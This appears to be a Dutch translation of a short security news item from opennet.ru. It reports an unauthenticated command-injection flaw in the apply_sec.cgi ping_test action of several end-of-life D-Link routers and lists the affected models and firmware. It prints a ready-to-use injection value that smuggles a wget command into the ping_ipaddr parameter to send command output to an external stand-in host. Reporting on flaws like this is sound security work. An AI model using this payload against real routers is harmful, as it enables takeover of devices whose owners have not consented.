In draadloze D-Link-routers
Interessant is dat volgens de firmware-ontwikkelaars de “ping_test”-aanroep alleen mag worden uitgevoerd na authenticatie, maar in werkelijkheid wordt deze hoe dan ook aangeroepen, ongeacht het inloggen op de webinterface. Met name wanneer het script apply_sec.cgi wordt geopend en de parameter “action=ping_test” wordt doorgegeven, wordt het script omgeleid naar de authenticatiepagina, maar wordt tegelijkertijd de actie uitgevoerd die is gekoppeld aan ping_test. Om de code uit te voeren werd in ping_test zelf een andere kwetsbaarheid gebruikt, die het ping-hulpprogramma aanroept zonder de juistheid van het IP-adres dat ter test is verzonden, goed te controleren. Om bijvoorbeeld het wget-hulpprogramma aan te roepen en de resultaten van de opdracht “echo 1234” naar een externe host over te dragen, geeft u eenvoudigweg de parameter “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// op test.test/?$(echo 1234)".
De aanwezigheid van de kwetsbaarheid is officieel bevestigd in de volgende modellen:
- DIR-655 met firmware 3.02b05 of ouder;
- DIR-866L met firmware 1.03b04 of ouder;
- DIR-1565 met firmware 1.01 of ouder;
- DIR-652 (er wordt geen informatie verstrekt over problematische firmwareversies)
De supportperiode voor deze modellen is al verlopen, aldus D-Link
Later werd ontdekt dat er ook een kwetsbaarheid was
Bron: opennet.ru